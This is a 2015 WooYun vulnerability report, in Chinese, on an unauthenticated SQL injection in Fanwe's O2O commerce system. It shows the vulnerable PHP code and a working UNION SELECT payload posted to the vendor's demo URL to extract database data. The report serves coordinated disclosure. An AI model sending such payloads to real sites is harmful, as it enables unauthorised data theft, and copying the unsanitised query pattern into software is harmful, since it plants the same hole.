当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0122566

漏洞标题:方维O2O商业系统SQL注入4(直接出数据、demo验证)

相关厂商:fanwe.com

漏洞作者: story

提交时间:2015-06-25 12:48

修复时间:2015-09-28 12:36

公开时间:2015-09-28 12:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-25: 细节已通知厂商并且等待厂商处理中
2015-06-30: 厂商已经确认,细节仅向厂商公开
2015-07-03: 细节向第三方安全合作伙伴开放
2015-08-24: 细节向核心白帽子及相关领域专家公开
2015-09-03: 细节向普通白帽子公开
2015-09-13: 细节向实习白帽子公开
2015-09-28: 细节向公众公开

简要描述:

UNION SELECT注入,直接出数据,demo验证,无需登录,只要一个POST数据库,可批量。

详细说明:

/app/Lib/main/ajaxModule.class.php

public function publish_img_edit(){
$data = array();
$data['status'] = 1;
$data['html'] = '';

$img_ids = $_POST['img_ids'];
$img_list = $GLOBALS['db']->getAll("SELECT * FROM ".DB_PREFIX."topic_image WHERE id in(".implode(",", $img_ids).")");
//输出表情数据html 和标签数据
$result = $GLOBALS['db']->getAll("select `type`,`title`,`emotion`,`filename` from ".DB_PREFIX."expression order by type");
$expression = array();
foreach($result as $k=>$v)
{
$v['filename'] = "./public/expression/".$v['type']."/".$v['filename'];
$v['emotion'] = str_replace(array('[',']'),array('',''),$v['emotion']);
$expression[$v['type']][] = $v;
}
$tag_list =$GLOBALS['db']->getAll("select name from ".DB_PREFIX."topic_tag where is_preset = 1 order by count desc");

$GLOBALS['tmpl']->assign("img_list",$img_list);
$GLOBALS['tmpl']->assign("tag_list",$tag_list);
$GLOBALS['tmpl']->assign("expression",$expression);
$data['html'] = $GLOBALS['tmpl']->fetch("inc/publish_img_edit.html");
ajax_return($data);
}


直接拿出POST['img_ids'],插入SQL语句。
$img_ids = $_POST['img_ids'];
$img_list = $GLOBALS['db']->getAll("SELECT * FROM ".DB_PREFIX."topic_image WHERE id in(".implode(",", $img_ids).")");
该模块无需登录,并且有回显,可以直接union select:

QQ20150624-3@2x.png


http://o2odemo.fanwe.net/index.php?ctl=ajax&act=publish_img_edit
POST数据:
img_ids[1]=-1) UNION SELECT%0b1,2,3,4,5,6,7,concat(0x212121,(user()),0x212121),9,10,11,12%23
测试代码里附上验证脚本,demo测试截图:

QQ20150624-4@2x.png

漏洞证明:

QQ20150624-3@2x.png

修复方案:

过滤。

版权声明:转载请注明来源 story@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-06-30 12:34

厂商回复:

正在处理

最新状态:

暂无